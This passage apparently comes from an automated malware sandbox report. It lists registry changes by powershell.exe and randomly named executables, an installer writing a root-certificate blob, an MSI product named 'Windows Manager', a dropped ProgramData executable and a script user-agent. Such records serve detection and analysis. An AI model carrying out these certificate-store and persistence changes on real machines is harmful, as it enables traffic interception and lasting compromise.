Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | 59vTTgxQkNQc5rmC6nQhRefv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" | LzmwAqmV.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" | LzmwAqmV.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 | msiexec.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | LzmwAqmV.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | kvXppC1RJ_LmP970tG_k_8kU.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | kvXppC1RJ_LmP970tG_k_8kU.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | LzmwAqmV.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | 59vTTgxQkNQc5rmC6nQhRefv.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | LzmwAqmV.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | kvXppC1RJ_LmP970tG_k_8kU.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | LzmwAqmV.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
-
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exemsiexec.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) 
\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5f3fe4a241abd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}\650478DC7424C37C svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\ MicrosoftEdge.exe Set value (int) 
\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "338592514" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = b9d9ec28329fd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{LJDG576V-FJ1Y-M3DK-T0ZJ-KIMQL256VU13} svchost.exe Key created 
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}\7289246C77593EBF svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}\650478DC7424C37C\2 = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set 
value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 034d79263fabd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f
25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 installer.exe -
NTFS ADS 2 IoCs
Processes:
description / ioc / process
File created: C:\ProgramData\SQWM6AN8HIEEB4JT.exe:Zone.Identifier (D2B.exe)
File opened for modification: C:\ProgramData\SQWM6AN8HIEEB4JT.exe:Zone.Identifier (D2B.exe)
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description / flow / ioc
HTTP User-Agent header, flow 14: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header, flow 122: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header, flow 686: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header, flow 820: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
